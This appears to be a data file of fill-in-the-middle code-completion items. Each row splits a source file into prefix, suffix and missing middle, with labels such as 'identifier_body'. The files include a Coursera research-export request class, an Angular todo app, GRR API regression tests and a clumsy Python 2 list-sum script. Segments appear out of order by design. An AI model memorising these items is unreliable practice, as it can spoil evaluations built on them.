self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done with the exception that only specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
Create a ExportResource object using the parameters required. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK: | else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest, assume that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope, assume that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human readable name for this scope context. course slugs for courses,
partner short names for partners, but only group ids for groups (api is
not open)
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display only property for schemas names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False | return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES' | random_line_split |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
Represents a export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
No validation is done with the exception that only specification of
scope is used (course/partner/group).
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
Create a ExportResource object using the parameters required. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
kwargs['partner_id'] = utils.lookup_partner_id_by_short_name(
kwargs['partner_short_name'])
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
|
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
if self.anonymity_level == ANONYMITY_LEVEL_COORDINATOR:
return 'Linked'
elif self.anonymity_level == ANONYMITY_LEVEL_ISOLATED:
return 'Isolated'
else:
return 'Unknown'
@property
def statement_of_purpose(self):
return self._statement_of_purpose
@property
def interval(self):
return self._interval
@property
def ignore_existing(self):
return self._ignore_existing
@property
def scope_context(self):
"""
Context for this ExportRequest, assume that only one identifier for
partner/course/group is defined.
"""
if self._course_id:
return 'COURSE'
elif self._partner_id:
return 'PARTNER'
elif self._group_id:
return 'GROUP'
else:
return None
@property
def scope_id(self):
"""
Identifier for the scope, assume that only one of course/partner/group
is defined for a valid request.
:return scope_id:
"""
return self._course_id or self._partner_id or self._group_id
@property
def scope_name(self):
"""
Human readable name for this scope context. course slugs for courses,
partner short names for partners, but only group ids for groups (api is
not open)
:return:
"""
if self._course_id:
return utils.lookup_course_slug_by_id(self._course_id)
elif self._partner_id:
return utils.lookup_partner_short_name_by_id(self._partner_id)
elif self._group_id:
return self._group_id
else:
return 'UNKNOWN'
@property
def schema_names(self):
return self._schema_names
@property
def schema_names_display(self):
"""
Display only property for schemas names.
:return schemas:
"""
if self._schema_names:
if set(self._schema_names) == set(SCHEMA_NAMES):
return 'all'
else:
return ','.join(self._schema_names)
else:
return None
def __eq__(self, other):
"""
Override for internal equality checks as suggested at:
http://stackoverflow.com/a/390640
"""
if type(other) is type(self):
return self.__dict__ == other.__dict__
return False
| return self._export_type | identifier_body |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void |
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| {
this.addTodo(inputElement.value);
inputElement.value = '';
} | identifier_body |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void { |
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule); | const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
} | random_line_split |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
| (public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) {
todo.title = target.value;
this.todoEdit = null;
} else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| constructor | identifier_name |
index.ts | /**
* @license
* Copyright Google Inc. All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
import {Component, NgModule} from '@angular/core';
import {BrowserModule} from '@angular/platform-browser';
import {platformBrowserDynamic} from '@angular/platform-browser-dynamic';
import {Store, Todo, TodoFactory} from './app/TodoStore';
@Component({selector: 'todo-app', viewProviders: [Store, TodoFactory], templateUrl: 'todo.html'})
export class TodoApp {
todoEdit: Todo = null;
constructor(public todoStore: Store<Todo>, public factory: TodoFactory) {}
enterTodo(inputElement: HTMLInputElement): void {
this.addTodo(inputElement.value);
inputElement.value = '';
}
editTodo(todo: Todo): void {
this.todoEdit = todo;
}
doneEditing($event: KeyboardEvent, todo: Todo): void {
const which = $event.which;
const target = $event.target as HTMLInputElement;
if (which === 13) | else if (which === 27) {
this.todoEdit = null;
target.value = todo.title;
}
}
addTodo(newTitle: string): void {
this.todoStore.add(this.factory.create(newTitle, false));
}
completeMe(todo: Todo): void {
todo.completed = !todo.completed;
}
deleteMe(todo: Todo): void {
this.todoStore.remove(todo);
}
toggleAll($event: MouseEvent): void {
const isComplete = ($event.target as HTMLInputElement).checked;
this.todoStore.list.forEach((todo: Todo) => {
todo.completed = isComplete;
});
}
clearCompleted(): void {
this.todoStore.removeBy((todo: Todo) => todo.completed);
}
}
@NgModule({declarations: [TodoApp], bootstrap: [TodoApp], imports: [BrowserModule]})
export class ExampleModule {
}
platformBrowserDynamic().bootstrapModule(ExampleModule);
| {
todo.title = target.value;
this.todoEdit = null;
} | conditional_block |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
|
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
| api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe")) | identifier_body |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def | (self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
| Run | identifier_name |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
| api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
app.run(main) | class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin, | random_line_split |
config_regression_test.py | #!/usr/bin/env python
"""This modules contains regression tests for config API handler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl import app
from grr_response_server.gui import api_regression_test_lib
from grr_response_server.gui.api_plugins import config as config_plugin
from grr_response_server.gui.api_plugins import config_test as config_plugin_test
class ApiListGrrBinariesHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "ListGrrBinaries"
handler = config_plugin.ApiListGrrBinariesHandler
def Run(self):
self.SetUpBinaries()
self.Check("ListGrrBinaries")
class ApiGetGrrBinaryHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinary"
handler = config_plugin.ApiGetGrrBinaryHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinary",
args=config_plugin.ApiGetGrrBinaryArgs(
type="EXECUTABLE", path="windows/test.exe"))
class ApiGetGrrBinaryBlobHandlerRegressionTest(
config_plugin_test.ApiGrrBinaryTestMixin,
api_regression_test_lib.ApiRegressionTest):
api_method = "GetGrrBinaryBlob"
handler = config_plugin.ApiGetGrrBinaryBlobHandler
def Run(self):
self.SetUpBinaries()
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="PYTHON_HACK", path="test"))
self.Check(
"GetGrrBinaryBlob",
args=config_plugin.ApiGetGrrBinaryBlobArgs(
type="EXECUTABLE", path="windows/test.exe"))
def main(argv):
api_regression_test_lib.main(argv)
if __name__ == "__main__":
| app.run(main) | conditional_block |
|
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
|
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| """Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False | identifier_body |
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def | (num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| sum | identifier_name |
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
return False
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
| for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main() | if check_list(num_list):
final_sum = 1
| random_line_split |
operate_list.py | # Define a function sum() and a function multiply()
# that sums and multiplies (respectively) all the numbers in a list of numbers.
# For example, sum([1, 2, 3, 4]) should return 10,
# and multiply([1, 2, 3, 4]) should return 24.
def check_list(num_list):
"""Check if input is list"""
if num_list is None:
return False
if len(num_list) == 0:
|
new_list = []
for i in num_list:
if i!='[' and i!=']' and i!=',':
new_list.append(i)
for x in new_list:
if type(x) != int:
return False
return True
def sum(num_list):
"""Compute sum of list values"""
if check_list(num_list):
final_sum = 0
for i in num_list:
final_sum = final_sum + i
return final_sum
else:
return False
def multiply(num_list):
"""Multiply list values"""
if check_list(num_list):
final_sum = 1
for i in num_list:
final_sum = final_sum * i
return final_sum
else:
return False
def main():
get_list = input("Enter list: ")
operations = [sum, multiply]
print map(lambda x: x(get_list), operations)
if __name__ == "__main__":
main()
| return False | conditional_block |
abstract-data-service-adapter.ts | ?: any;
/** The name of this adapter. */
name: string;
/** The [[IAjaxAdapter]] used by this [[IDataServiceAdapter]]. */
ajaxImpl: IAjaxAdapter;
co | {
}
// TODO use interface
checkForRecomposition(interfaceInitializedArgs: any) {
if (interfaceInitializedArgs.interfaceName === "ajax" && interfaceInitializedArgs.isDefault) {
this.initialize();
}
}
initialize() {
this.ajaxImpl = config.getAdapterInstance<IAjaxAdapter>("ajax") !;
// don't cache 'ajax' because then we would need to ".bind" it, and don't want to because of brower support issues.
if (this.ajaxImpl && this.ajaxImpl.ajax) {
return;
}
throw new Error("Unable to find ajax adapter for dataservice adapter '" + (this.name || '') + "'.");
}
fetchMetadata(metadataStore: MetadataStore, dataService: DataService) {
let serviceName = dataService.serviceName;
let url = dataService.qualifyUrl("Metadata");
let promise = new Promise((resolve, reject) => {
this.ajaxImpl.ajax({
type: "GET",
url: url,
dataType: 'json',
success: (httpResponse: IHttpResponse) => {
// might have been fetched by another query
if (metadataStore.hasMetadataFor(serviceName)) {
return resolve("already fetched");
}
let data = httpResponse.data;
let metadata: any;
try {
metadata = typeof (data) === "string" ? JSON.parse(data) : data;
metadataStore.importMetadata(metadata);
} catch (e) {
let errMsg = "Unable to either parse or import metadata: " + e.message;
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url + ". " + errMsg);
}
// import may have brought in the service.
if (!metadataStore.hasMetadataFor(serviceName)) {
metadataStore.addDataService(dataService);
}
resolve(metadata);
},
error: (httpResponse: IHttpResponse) => {
handleHttpError(reject, httpResponse, "Metadata query failed for: " + url);
}
});
});
return promise;
}
executeQuery(mappingContext: MappingContext) {
mappingContext.adapter = this;
let promise = new Promise<IQueryResult>((resolve, reject) => {
let url = mappingContext.getUrl();
let params = {
type: "GET",
url: url,
params: (mappingContext.query as EntityQuery).parameters,
dataType: 'json',
success: function (httpResponse: IHttpResponse) {
let data = httpResponse.data;
try {
let rData: IQueryResult;
let results = data && (data.results || data.Results);
if (results) {
rData = { results: results, inlineCount: data.inlineCount || data.InlineCount,
httpResponse: httpResponse, query: mappingContext.query };
} else {
rData = { results: data, httpResponse: httpResponse, query: mappingContext.query };
}
resolve(rData);
} catch (e) {
if (e instanceof Error) {
reject(e);
} else {
handleHttpError(reject, httpResponse);
}
}
},
error: function (httpResponse: IHttpResponse) {
handleHttpError(reject, httpResponse);
},
crossDomain: false
};
if (mappingContext.dataService.useJsonp) {
params.dataType = 'jsonp';
params.crossDomain = true;
}
this.ajaxImpl.ajax(params);
});
return promise;
}
saveChanges(saveContext: ISaveContext, saveBundle: ISaveBundle) {
let adapter = saveContext.adapter = this;
let saveBundleSer = adapter._prepareSaveBundle(saveContext, saveBundle);
let bundle = JSON.stringify(saveBundleSer);
let url = saveContext.dataService.qualifyUrl(saveContext.resourceName);
let promise = new Promise<ISaveResult>((resolve, reject) => {
this.ajaxImpl.ajax({
type: "POST",
url: url,
dataType: 'json',
contentType: "application/json",
data: bundle,
